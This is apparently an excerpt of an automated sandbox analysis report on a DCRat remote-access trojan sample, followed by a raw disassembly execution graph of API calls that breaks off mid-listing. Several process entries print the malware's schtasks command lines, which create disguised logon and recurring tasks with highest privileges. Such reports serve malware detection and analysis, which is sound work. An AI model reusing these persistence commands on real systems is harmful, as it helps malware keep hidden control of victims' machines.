                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:30
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:31
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:32
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:33
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:34
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Windows\System32\schtasks.exe
                Wow64 process (32bit):false
                Commandline:schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f
                Imagebase:0x7ff76f990000
                File size:235'008 bytes
                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:35
                Start time:00:07:07
                Start date:17/06/2024
                Path:C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe"
                Imagebase:0xe50000
                File size:847'872 bytes
                MD5 hash:05CF6D069F5B66212AF39C9D6C440CCE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                Antivirus matches:
                • Detection: 88%, ReversingLabs
                • Detection: 69%, Virustotal, Browse
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:9.6%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:9.4%
                  Total number of Nodes:1465
                  Total number of Limit Nodes:26
                  execution_graph 24783 a1e9a0 51 API calls 24730 a0e4a2 38 API calls 2 library calls 24732 9fea98 FreeLibrary 22859 a190b0 22867 a1a56f 22859->22867 22863 a190cc 22864 a190d9 22863->22864 22875 a190e0 11 API calls 22863->22875 22866 a190c4 22876 a1a458 22867->22876 22870 a1a5ae TlsAlloc 22872 a1a59f 22870->22872 22883 a0ec4a 22872->22883 22873 a190ba 22873->22866 22874 a19029 20 API calls 3 library calls 22873->22874 22874->22863 22875->22866 22877 a1a488 22876->22877 22881 a1a484 22876->22881 22877->22870 22877->22872 22878 a1a4a8 22878->22877 22880 a1a4b4 GetProcAddress 22878->22880 22882 a1a4c4 __crt_fast_encode_pointer 22880->22882 22881->22877 22881->22878 22890 a1a4f4 22881->22890 22882->22877 22884 a0ec53 22883->22884 22885 a0ec55 IsProcessorFeaturePresent 22883->22885 22884->22873 22887 a0f267 22885->22887 22897 a0f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22887->22897 22889 a0f34a 22889->22873 22891 a1a515 LoadLibraryExW 22890->22891 22896 a1a50a 22890->22896 22892 a1a532 GetLastError 22891->22892 22893 a1a54a 22891->22893 22892->22893 22894 a1a53d LoadLibraryExW 22892->22894 22895 a1a561 FreeLibrary 22893->22895 22893->22896 22894->22893 22895->22896 22896->22881 22897->22889 22898 a1a3b0 22901 a1a3bb 22898->22901 22900 a1a3e4 22911 a1a410 DeleteCriticalSection 22900->22911 22901->22900 22902 a1a3e0 22901->22902 22904 a1a6ca 22901->22904 22905 a1a458 __dosmaperr 5 API calls 22904->22905 22906 a1a6f1 22905->22906 22907 a1a70f InitializeCriticalSectionAndSpinCount 22906->22907 22910 a1a6fa 22906->22910 22907->22910 22908 a0ec4a DloadUnlock 5 API calls 22909 a1a726 22908->22909 22909->22901 22910->22908 22911->22902 24734 a11eb0 6 API calls 3 library calls 24784 a179b7 55 API calls _free 22913 9f1385 82 API calls 3 library calls 24735 a176bd 52 API calls 3 library calls 24788 a15780 QueryPerformanceFrequency QueryPerformanceCounter 24737 a1ac0e 27 API calls DloadUnlock 24739 9f16b0 84 API calls 24740 a07090 114 API calls 24741 a0cc90 70 API calls 24790 a0a990 97 API calls 24791 a09b90 GdipCloneImage GdipAlloc 23194 a0d891 19 API calls ___delayLoadHelper2@8 24792 a19b90 21 API calls 2 library calls 24793 a12397 48 API calls 23196 a0d997 23197 a0d89b 23196->23197 23198 a0df59 ___delayLoadHelper2@8 19 API calls 23197->23198 23198->23197 24743 a0a89d 78 API calls 24744 9f96a0 79 API calls 23203 a0aee0 23204 a0aeea __EH_prolog 23203->23204 23366 9f130b 23204->23366 23207 a0b5cb 23441 a0cd2e 23207->23441 23208 a0af2c 23211 a0afa2 23208->23211 23212 a0af39 23208->23212 23275 a0af18 23208->23275 23215 a0b041 GetDlgItemTextW 23211->23215 23221 a0afbc 23211->23221 23216 a0af75 23212->23216 23217 a0af3e 23212->23217 23213 a0b5f7 23219 a0b600 SendDlgItemMessageW 23213->23219 23220 a0b611 GetDlgItem SendMessageW 23213->23220 23214 a0b5e9 SendMessageW 23214->23213 23215->23216 23218 a0b077 23215->23218 23222 a0af96 KiUserCallbackDispatcher 23216->23222 23216->23275 23226 9fddd1 53 API calls 23217->23226 23217->23275 23223 a0b08f GetDlgItem 23218->23223 23363 a0b080 23218->23363 23219->23220 23459 a09da4 GetCurrentDirectoryW 23220->23459 23225 9fddd1 53 API calls 23221->23225 23222->23275 23229 a0b0a4 SendMessageW SendMessageW 23223->23229 23230 a0b0c5 SetFocus 23223->23230 23231 a0afde SetDlgItemTextW 23225->23231 23227 a0af58 23226->23227 23481 9f1241 SHGetMalloc 23227->23481 23228 a0b641 GetDlgItem 23233 a0b664 SetWindowTextW 23228->23233 23234 a0b65e 23228->23234 23229->23230 23235 a0b0d5 23230->23235 23246 a0b0ed 23230->23246 23236 a0afec 23231->23236 23460 a0a2c7 GetClassNameW 23233->23460 23234->23233 23240 9fddd1 53 API calls 23235->23240 23244 a0aff9 GetMessageW 23236->23244 23236->23275 23237 a0af5f 23241 a0af63 SetDlgItemTextW 23237->23241 23237->23275 23238 a0b56b 23242 9fddd1 53 API calls 23238->23242 23245 a0b0df 23240->23245 23241->23275 23247 a0b57b SetDlgItemTextW 23242->23247 23249 a0b010 IsDialogMessageW 23244->23249 23244->23275 23482 a0cb5a 23245->23482 23254 9fddd1 53 API calls 23246->23254 23252 a0b58f 23247->23252 23249->23236 23251 a0b01f TranslateMessage DispatchMessageW 23249->23251 23251->23236 23257 9fddd1 53 API calls 23252->23257 23256 a0b124 23254->23256 23255 a0b6af 23259 a0b6df 23255->23259 23265 9fddd1 53 API calls 23255->23265 23260 9f400a _swprintf 51 API calls 23256->23260 23261 a0b5b8 23257->23261 23258 a0bdf5 98 API calls 23258->23255 23267 a0b797 23259->23267 23274 a0bdf5 98 API calls 23259->23274 23266 a0b136 23260->23266 23268 9fddd1 53 API calls 23261->23268 23262 a0b0e6 23376 9fa04f 23262->23376 23272 a0b6c2 SetDlgItemTextW 23265->23272 23273 a0cb5a 16 API calls 23266->23273 23269 a0b847 23267->23269 23303 a0b825 23267->23303 23310 9fddd1 53 API calls 23267->23310 23268->23275 23276 a0b850 EnableWindow 23269->23276 23277 a0b859 23269->23277 23270 a0b174 GetLastError 23271 a0b17f 23270->23271 23382 a0a322 SetCurrentDirectoryW 23271->23382 23279 9fddd1 53 API calls 23272->23279 23273->23262 23280 a0b6fa 23274->23280 23276->23277 23281 a0b876 23277->23281 23500 9f12c8 GetDlgItem EnableWindow 23277->23500 23283 a0b6d6 SetDlgItemTextW 23279->23283 23287 a0b70c 23280->23287 23294 a0b731 23280->23294 23297 a0b895 SendMessageW 23281->23297 23298 a0b89d 23281->23298 23282 a0b195 23286 a0b19e GetLastError 23282->23286 23295 a0b1ac 23282->23295 23283->23259 23285 a0b78a 23290 a0bdf5 98 API calls 23285->23290 23286->23295 23498 a09635 32 API calls 23287->23498 23289 a0b86c 23501 9f12c8 GetDlgItem EnableWindow 23289->23501 23290->23267 23291 9fddd1 53 API calls 23299 a0b8b6 SetDlgItemTextW 23291->23299 23292 a0b725 23292->23294 23294->23285 23311 a0bdf5 98 API calls 23294->23311 23296 a0b227 23295->23296 23300 a0b237 23295->23300 23302 a0b1c4 GetTickCount 23295->23302 23296->23300 23301 a0b46c 23296->23301 23297->23298 23298->23275 23298->23291 23299->23275 23305 a0b407 23300->23305 23306 a0b24f GetModuleFileNameW 23300->23306 23398 9f12e6 GetDlgItem ShowWindow 23301->23398 23307 9f400a _swprintf 51 API calls 23302->23307 23499 a09635 32 API calls 23303->23499 23305->23216 23318 9fddd1 53 API calls 23305->23318 23492 9feb3a 80 API calls 23306->23492 23314 a0b1dd 23307->23314 23309 a0b844 23309->23269 23310->23267 23315 a0b75f 23311->23315 23312 a0b47c 23399 9f12e6 GetDlgItem ShowWindow 23312->23399 23383 9f971e 23314->23383 23315->23285 23320 a0b768 DialogBoxParamW 23315->23320 23317 a0b275 23322 9f400a _swprintf 51 API calls 23317->23322 23319 a0b41b 23318->23319 23323 9f400a _swprintf 51 API calls 23319->23323 23320->23216 23320->23285 23321 a0b486 23400 9fddd1 23321->23400 23326 a0b297 CreateFileMappingW 23322->23326 23328 a0b439 23323->23328 23327 a0b2f9 GetCommandLineW 23326->23327 23360 a0b376 __vsnwprintf_l 23326->23360 23332 a0b30a 23327->23332 23342 9fddd1 53 API calls 23328->23342 23329 a0b203 23333 a0b215 23329->23333 23334 a0b20a GetLastError 23329->23334 23493 a0ab2e SHGetMalloc 23332->23493 23391 9f9653 23333->23391 23334->23333 23335 a0b381 ShellExecuteExW 23355 a0b39e 23335->23355 23336 a0b4a2 SetDlgItemTextW GetDlgItem 23339 a0b4d7 23336->23339 23340 a0b4bf GetWindowLongW SetWindowLongW 23336->23340 23404 a0bdf5 23339->23404 23340->23339 23341 a0b326 23494 a0ab2e SHGetMalloc 23341->23494 23342->23216 23346 a0b332 23495 a0ab2e SHGetMalloc 23346->23495 23347 a0b3e1 23347->23305 23354 a0b3f7 UnmapViewOfFile CloseHandle 23347->23354 23348 a0bdf5 98 API calls 23350 a0b4f3 23348->23350 23429 a0d0f5 23350->23429 23351 a0b33e 23496 9fecad 80 API calls ___scrt_get_show_window_mode 23351->23496 23354->23305 23355->23347 23358 a0b3cd Sleep 23355->23358 23357 a0b355 MapViewOfFile 23357->23360 23358->23347 23358->23355 23359 a0bdf5 98 API calls 23364 a0b519 23359->23364 23360->23335 23361 a0b542 23497 9f12c8 GetDlgItem EnableWindow 23361->23497 23363->23216 23363->23238 23364->23361 23365 a0bdf5 98 API calls 23364->23365 23365->23361 23367 9f136d 23366->23367 23368 9f1314 23366->23368 23503 9fda71 GetWindowLongW SetWindowLongW 23367->23503 23369 9f137a 23368->23369 23502 9fda98 62 API calls 2 library calls 23368->23502 23369->23207 23369->23208 23369->23275 23372 9f1336 23372->23369 23373 9f1349 GetDlgItem 23372->23373 23373->23369 23374 9f1359 23373->23374 23374->23369 23375 9f135f SetWindowTextW 23374->23375 23375->23369 23378 9fa059 23376->23378 23377 9fa0ea 23379 9fa207 9 API calls 23377->23379 23380 9fa113 23377->23380 23378->23377 23378->23380 23504 9fa207 23378->23504 23379->23380 23380->23270 23380->23271 23382->23282 23384 9f9728 23383->23384 23385 9f9792 CreateFileW 23384->23385 23386 9f9786 23384->23386 23385->23386 23387 9f97e4 23386->23387 23388 9fb66c 2 API calls 23386->23388 23387->23329 23389 9f97cb 23388->23389 23389->23387 23390 9f97cf CreateFileW 23389->23390 23390->23387 23392 9f9688 23391->23392 23393 9f9677 23391->23393 23392->23296 23393->23392 23394 9f968a 23393->23394 23395 9f9683 23393->23395 23530 9f96d0 23394->23530 23525 9f9817 23395->23525 23398->23312 23399->23321 23545 9fddff 23400->23545 23403 9f12e6 GetDlgItem ShowWindow 23403->23336 23405 a0bdff __EH_prolog 23404->23405 23406 a0b4e5 23405->23406 23407 a0aa36 ExpandEnvironmentStringsW 23405->23407 23406->23348 23418 a0be36 _wcsrchr 23407->23418 23409 a0aa36 ExpandEnvironmentStringsW 23409->23418 23410 a0c11d SetWindowTextW 23410->23418 23413 a135de 22 API calls 23413->23418 23415 a0bf0b SetFileAttributesW 23417 a0bfc5 GetFileAttributesW 23415->23417 23428 a0bf25 ___scrt_get_show_window_mode 23415->23428 23417->23418 23420 a0bfd7 DeleteFileW 23417->23420 23418->23406 23418->23409 23418->23410 23418->23413 23418->23415 23421 a0c2e7 GetDlgItem SetWindowTextW SendMessageW 23418->23421 23424 a0c327 SendMessageW 23418->23424 23568 a017ac CompareStringW 23418->23568 23569 a09da4 GetCurrentDirectoryW 23418->23569 23571 9fa52a 7 API calls 23418->23571 23572 9fa4b3 FindClose 23418->23572 23573 a0ab9a 76 API calls ___std_exception_copy 23418->23573 23420->23418 23422 a0bfe8 23420->23422 23421->23418 23423 9f400a _swprintf 51 API calls 23422->23423 23425 a0c008 GetFileAttributesW 23423->23425 23424->23418 23425->23422 23426 a0c01d MoveFileW 23425->23426 23426->23418 23427 a0c035 MoveFileExW 23426->23427 23427->23418 23428->23417 23428->23418 23570 9fb4f7 52 API calls 2 library calls 23428->23570 23430 a0d0ff __EH_prolog 23429->23430 23574 9ffead 23430->23574 23432 a0d130 23578 9f5c59 23432->23578 23434 a0d14e 23582 9f7c68 23434->23582 23438 a0d1a1 23599 9f7cfb 23438->23599 23440 a0b504 23440->23359 23442 a0cd38 23441->23442 24062 a09d1a 23442->24062 23445 a0cd45 GetWindow 23446 a0b5d1 23445->23446 23449 a0cd65 23445->23449 23446->23213 23446->23214 23447 a0cd72 GetClassNameW 24067 a017ac CompareStringW 23447->24067 23449->23446 23449->23447 23450 a0cd96 GetWindowLongW 23449->23450 23451 a0cdfa GetWindow 23449->23451 23450->23451 23452 a0cda6 SendMessageW 23450->23452 23451->23446 23451->23449 23452->23451 23453 a0cdbc GetObjectW 23452->23453 24068 a09d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23453->24068 23455 a0cdd3 24069 a09d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23455->24069 24070 a09f5d 8 API calls ___scrt_get_show_window_mode 23455->24070 23458 a0cde4 SendMessageW DeleteObject 23458->23451 23459->23228 23461 a0a2e8 23460->23461 23462 a0a30d 23460->23462 24073 a017ac CompareStringW 23461->24073 23463 a0a312 SHAutoComplete 23462->23463 23464 a0a31b 23462->23464 23463->23464 23468 a0a7c3 23464->23468 23466 a0a2fb 23466->23462 23467 a0a2ff FindWindowExW 23466->23467 23467->23462 23469 a0a7cd __EH_prolog 23468->23469 23470 9f1380 82 API calls 23469->23470 23471 a0a7ef 23470->23471 24074 9f1f4f 23471->24074 23474 a0a818 23476 9f1951 126 API calls 23474->23476 23475 a0a809 23477 9f1631 84 API calls 23475->23477 23480 a0a83a __vsnwprintf_l ___std_exception_copy 23476->23480 23478 a0a814 23477->23478 23478->23255 23478->23258 23479 9f1631 84 API calls 23479->23478 23480->23478 23480->23479 23481->23237 24082 a0ac74 PeekMessageW 23482->24082 23485 a0cb88 23491 a0cb93 ShowWindow SendMessageW SendMessageW 23485->23491 23486 a0cbbc SendMessageW SendMessageW 23487 a0cc17 SendMessageW SendMessageW SendMessageW 23486->23487 23488 a0cbf8 23486->23488 23489 a0cc4a SendMessageW 23487->23489 23490 a0cc6d SendMessageW 23487->23490 23488->23487 23489->23490 23490->23262 23491->23486 23492->23317 23493->23341 23494->23346 23495->23351 23496->23357 23497->23363 23498->23292 23499->23309 23500->23289 23501->23281 23502->23372 23503->23369 23505 9fa214 23504->23505 23506 9fa238 23505->23506 23507 9fa22b CreateDirectoryW 23505->23507 23508 9fa180 4 API calls 23506->23508 23507->23506 23509 9fa26b 23507->23509 23510 9fa23e 23508->23510 23514 9fa27a 23509->23514 23517 9fa444 23509->23517 23511 9fa27e GetLastError 23510->23511 23512 9fb66c 2 API calls 23510->23512 23511->23514 23515 9fa254 23512->23515 23514->23378 23515->23511 23516 9fa258 CreateDirectoryW 23515->23516 23516->23509 23516->23511 23518 a0e360 23517->23518 23519 9fa451 SetFileAttributesW 23518->23519 23520 9fa467 23519->23520 23521 9fa494 23519->23521 23522 9fb66c 2 API calls 23520->23522 23521->23514 23523 9fa47b 23522->23523 23523->23521 23524 9fa47f SetFileAttributesW 23523->23524 23524->23521 23526 9f9820 23525->23526 23527 9f9824 23525->23527 23526->23392 23527->23526 23536 9fa12d 23527->23536 23531 9f96fa 23530->23531 23532 9f96dc 23530->23532 23533 9f9719 23531->23533 23544 9f6e3e 74 API calls 23531->23544 23532->23531 23534 9f96e8 FindCloseChangeNotification 23532->23534 23533->23392 23534->23531 23537 a0e360 23536->23537 23538 9fa13a DeleteFileW 23537->23538 23539 9fa14d 23538->23539 23540 9f984c 23538->23540 23541 9fb66c 2 API calls 23539->23541 23540->23392 23542 9fa161 23541->23542 23542->23540 23543 9fa165 DeleteFileW 23542->23543 23543->23540 23544->23533 23551 9fd28a 23545->23551 23548 9fddfc SetDlgItemTextW 23548->23403 23549 9fde22 LoadStringW 23549->23548 23550 9fde39 LoadStringW 23549->23550 23550->23548 23556 9fd1c3 23551->23556 23553 9fd2a7 23554 9fd2bc 23553->23554 23564 9fd2c8 26 API calls 23553->23564 23554->23548 23554->23549 23557 9fd1de 23556->23557 23563 9fd1d7 _strncpy 23556->23563 23558 9fd202 23557->23558 23565 a01596 WideCharToMultiByte 23557->23565 23560 9fd233 23558->23560 23566 9fdd6b 50 API calls __vsnprintf 23558->23566 23567 a158d9 26 API calls 3 library calls 23560->23567 23563->23553 23564->23554 23565->23558 23566->23560 23567->23563 23568->23418 23569->23418 23570->23428 23571->23418 23572->23418 23573->23418 23575 9ffeba 23574->23575 23603 9f1789 23575->23603 23577 9ffed2 23577->23432 23579 9ffead 23578->23579 23580 9f1789 76 API calls 23579->23580 23581 9ffed2 23580->23581 23581->23434 23583 9f7c72 __EH_prolog 23582->23583 23620 9fc827 23583->23620 23585 9f7c8d 23626 a0e24a 23585->23626 23587 9f7cb7 23632 a0440b 23587->23632 23590 9f7ddf 23591 9f7de9 23590->23591 23592 9f7e53 23591->23592 23664 9fa4c6 23591->23664 23595 9f7ec4 23592->23595 23598 9fa4c6 8 API calls 23592->23598 23642 9f837f 23592->23642 23594 9f7f06 23594->23438 23595->23594 23670 9f6dc1 74 API calls 23595->23670 23598->23592 23600 9f7d09 23599->23600 23602 9f7d10 23599->23602 23601 a01acf 84 API calls 23600->23601 23601->23602 23604 9f179f 23603->23604 23615 9f17fa __vsnwprintf_l 23603->23615 23605 9f17c8 23604->23605 23616 9f6e91 74 API calls __vswprintf_c_l 23604->23616 23606 9f1827 23605->23606 23612 9f17e7 ___std_exception_copy 23605->23612 23608 a135de 22 API calls 23606->23608 23610 9f182e 23608->23610 23609 9f17be 23617 9f6efd 75 API calls 23609->23617 23610->23615 23619 9f6efd 75 API calls 23610->23619 23612->23615 23618 9f6efd 75 API calls 23612->23618 23615->23577 23616->23609 23617->23605 23618->23615 23619->23615 23621 9fc831 __EH_prolog 23620->23621 23622 a0e24a new 8 API calls 23621->23622 23623 9fc874 23622->23623 23624 a0e24a new 8 API calls 23623->23624 23625 9fc898 23624->23625 23625->23585 23629 a0e24f ___std_exception_copy 23626->23629 23627 a0e27b 23627->23587 23629->23627 23638 a171ad 7 API calls 2 library calls 23629->23638 23639 a0ecce RaiseException Concurrency::cancel_current_task new 23629->23639 23640 a0ecb1 RaiseException Concurrency::cancel_current_task 23629->23640 23633 a04415 __EH_prolog 23632->23633 23634 a0e24a new 8 API calls 23633->23634 23635 a04431 23634->23635 23636 9f7ce6 23635->23636 23641 a006ba 78 API calls 23635->23641 23636->23590 23638->23629 23641->23636 23643 9f8389 __EH_prolog 23642->23643 23671 9f1380 23643->23671 23645 9f83a4 23679 9f9ef7 23645->23679 23651 9f83d3 23799 9f1631 23651->23799 23652 9f846e 23698 9f8517 23652->23698 23655 9f84ce 23702 9f1f00 23655->23702 23659 9f83cf 23659->23651 23659->23652 23662 9fa4c6 8 API calls 23659->23662 23803 9fbac4 CompareStringW 23659->23803 23660 9f84d9 23660->23651 23706 9f3aac 23660->23706 23716 9f857b 23660->23716 23662->23659 23665 9fa4db 23664->23665 23666 9fa4df 23665->23666 24050 9fa5f4 23665->24050 23666->23591 23668 9fa4ef 23668->23666 23669 9fa4f4 FindClose 23668->23669 23669->23666 23670->23594 23672 9f1385 __EH_prolog 23671->23672 23673 9fc827 8 API calls 23672->23673 23674 9f13bd 23673->23674 23675 a0e24a new 8 API calls 23674->23675 23678 9f1416 ___scrt_get_show_window_mode 23674->23678 23676 9f1403 23675->23676 23676->23678 23805 9fb07d 23676->23805 23678->23645 23680 9f9f0e 23679->23680 23681 9f83ba 23680->23681 23821 9f6f5d 76 API calls 23680->23821 23681->23651 23683 9f19a6 23681->23683 23684 9f19b0 __EH_prolog 23683->23684 23694 9f1a00 23684->23694 23696 9f19e5 23684->23696 23822 9f709d 23684->23822 23686 9f1b50 23825 9f6dc1 74 API calls 23686->23825 23688 9f3aac 97 API calls 23692 9f1bb3 23688->23692 23689 9f1b60 23689->23688 23689->23696 23690 9f1bff 23690->23696 23697 9f1c32 23690->23697 23826 9f6dc1 74 API calls 23690->23826 23692->23690 23693 9f3aac 97 API calls 23692->23693 23693->23692 23694->23686 23694->23689 23694->23696 23695 9f3aac 97 API calls 23695->23697 23696->23659 23697->23695 23697->23696 23699 9f8524 23698->23699 23844 a00c26 GetSystemTime SystemTimeToFileTime 23699->23844 23701 9f8488 23701->23655 23804 a01359 72 API calls 23701->23804 23703 9f1f05 __EH_prolog 23702->23703 23704 9f1f39 23703->23704 23846 9f1951 23703->23846 23704->23660 23707 9f3abc 23706->23707 23708 9f3ab8 23706->23708 23709 9f3ae9 23707->23709 23710 9f3af7 23707->23710 23708->23660 23711 9f3b29 23709->23711 23980 9f3281 85 API calls 3 library calls 23709->23980 23981 9f27e8 97 API calls 3 library calls 23710->23981 23711->23660 23714 9f3af5 23714->23711 23982 9f204e 74 API calls 23714->23982 23717 9f8585 __EH_prolog 23716->23717 23718 9f85be 23717->23718 23726 9f85c2 23717->23726 24004 a084bd 99 API calls 23717->24004 23719 9f85e7 23718->23719 23724 9f867a 23718->23724 23718->23726 23720 9f8609 23719->23720 23719->23726 24005 9f7b66 151 API calls 23719->24005 23720->23726 24006 a084bd 99 API calls 23720->24006 23724->23726 23983 9f5e3a 23724->23983 23726->23660 23727 9f8705 23727->23726 23989 9f826a 23727->23989 23730 9f8875 23731 9fa4c6 8 API calls 23730->23731 23732 9f88e0 23730->23732 23731->23732 23993 9f7d6c 23732->23993 23734 9fc991 80 API calls 23738 9f893b _memcmp 23734->23738 23735 9f8a70 23736 9f8b43 23735->23736 23743 9f8abf 23735->23743 23741 9f8b9e 23736->23741 23751 9f8b4e 23736->23751 23737 9f8a69 24009 9f1f94 74 API calls 23737->24009 23738->23726 23738->23734 23738->23735 23738->23737 24007 9f8236 82 API calls 23738->24007 24008 9f1f94 74 API calls 23738->24008 23750 9f8b30 23741->23750 24012 9f80ea 96 API calls 23741->24012 23742 9f8b9c 23744 9f9653 79 API calls 23742->23744 23745 9fa180 4 API calls 23743->23745 23743->23750 23744->23726 23748 9f8af7 23745->23748 23747 9f9653 79 API calls 23747->23726 23748->23750 24010 9f9377 96 API calls 23748->24010 23749 9f8c09 23762 9f8c74 23749->23762 23798 9f91c1 __except_handler4 23749->23798 24013 9f9989 23749->24013 23750->23742 23750->23749 23751->23742 24011 9f7f26 100 API calls __except_handler4 23751->24011 23752 9faa88 8 API calls 23755 9f8cc3 23752->23755 23758 9faa88 8 API calls 23755->23758 23757 9f8c4c 23757->23762 24017 9f1f94 74 API calls 23757->24017 23772 9f8cd9 23758->23772 23760 9f8c62 24018 9f7061 75 API calls 23760->24018 23762->23752 23763 9f8d9c 23764 9f8efd 23763->23764 23765 9f8df7 23763->23765 23769 9f8f0f 23764->23769 23770 9f8f23 23764->23770 23786 9f8e27 23764->23786 23766 9f8e69 23765->23766 23768 9f8e07 23765->23768 23767 9f826a CharUpperW 23766->23767 23773 9f8e84 23767->23773 23774 9f8e4d 23768->23774 23780 9f8e15 23768->23780 23775 9f92e6 121 API calls 23769->23775 23771 a02c42 75 API calls 23770->23771 23776 9f8f3c 23771->23776 23772->23763 24019 9f9b21 SetFilePointer GetLastError SetEndOfFile 23772->24019 23781 9f8ead 23773->23781 23782 9f8eb4 23773->23782 23773->23786 23774->23786 24021 9f7907 108 API calls 23774->24021 23775->23786 24024 a028f1 121 API calls 23776->24024 24020 9f1f94 74 API calls 23780->24020 24022 9f7698 84 API calls __except_handler4 23781->24022 24023 9f9224 94 API calls __EH_prolog 23782->24023 23791 9f904b 23786->23791 24025 9f1f94 74 API calls 23786->24025 23788 9f9156 23790 9fa444 4 API calls 23788->23790 23788->23798 23789 9f9104 23999 9f9d62 23789->23999 23792 9f91b1 23790->23792 23791->23788 23791->23789 23791->23798 24026 9f9ebf SetEndOfFile 23791->24026 23792->23798 24027 9f1f94 74 API calls 23792->24027 23795 9f914b 23797 9f96d0 75 API calls 23795->23797 23797->23788 23798->23747 23800 9f1643 23799->23800 24042 9fc8ca 23800->24042 23803->23659 23804->23655 23806 9fb087 __EH_prolog 23805->23806 23811 9fea80 80 API calls 23806->23811 23808 9fb099 23812 9fb195 23808->23812 23811->23808 23813 9fb1a7 ___scrt_get_show_window_mode 23812->23813 23816 a00948 23813->23816 23819 a00908 GetCurrentProcess GetProcessAffinityMask 23816->23819 23820 9fb10f 23819->23820 23820->23678 23821->23681 23827 9f16d2 23822->23827 23824 9f70b9 23824->23694 23825->23696 23826->23697 23828 9f16e8 23827->23828 23839 9f1740 __vsnwprintf_l 23827->23839 23829 9f1711 23828->23829 23840 9f6e91 74 API calls __vswprintf_c_l 23828->23840 23830 9f1767 23829->23830 23836 9f172d ___std_exception_copy 23829->23836 23833 a135de 22 API calls 23830->23833 23832 9f1707 23841 9f6efd 75 API calls 23832->23841 23835 9f176e 23833->23835 23835->23839 23843 9f6efd 75 API calls 23835->23843 23836->23839 23842 9f6efd 75 API calls 23836->23842 23839->23824 23840->23832 23841->23829 23842->23839 23843->23839 23845 a00c56 __vsnwprintf_l 23844->23845 23845->23701 23847 9f1961 23846->23847 23849 9f195d 23846->23849 23850 9f1896 23847->23850 23849->23704 23851 9f18a8 23850->23851 23852 9f18e5 23850->23852 23853 9f3aac 97 API calls 23851->23853 23858 9f3f18 23852->23858 23854 9f18c8 23853->23854 23854->23849 23862 9f3f21 23858->23862 23859 9f3aac 97 API calls 23859->23862 23860 9f1906 23860->23854 23863 9f1e00 23860->23863 23862->23859 23862->23860 23875 a0067c 23862->23875 23864 9f1e0a __EH_prolog 23863->23864 23883 9f3b3d 23864->23883 23866 9f1e34 23867 9f16d2 76 API calls 23866->23867 23869 9f1ebb 23866->23869 23868 9f1e4b 23867->23868 23911 9f1849 76 API calls 23868->23911 23869->23854 23871 9f1e63 23873 9f1e6f 23871->23873 23912 a0137a MultiByteToWideChar 23871->23912 23913 9f1849 76 API calls 23873->23913 23876 a00683 23875->23876 23877 a0069e 23876->23877 23881 9f6e8c RaiseException Concurrency::cancel_current_task 23876->23881 23879 a006af SetThreadExecutionState 23877->23879 23882 9f6e8c RaiseException Concurrency::cancel_current_task 23877->23882 23879->23862 23881->23877 23882->23879 23884 9f3b47 __EH_prolog 23883->23884 23885 9f3b5d 23884->23885 23886 9f3b79 23884->23886 23942 9f6dc1 74 API calls 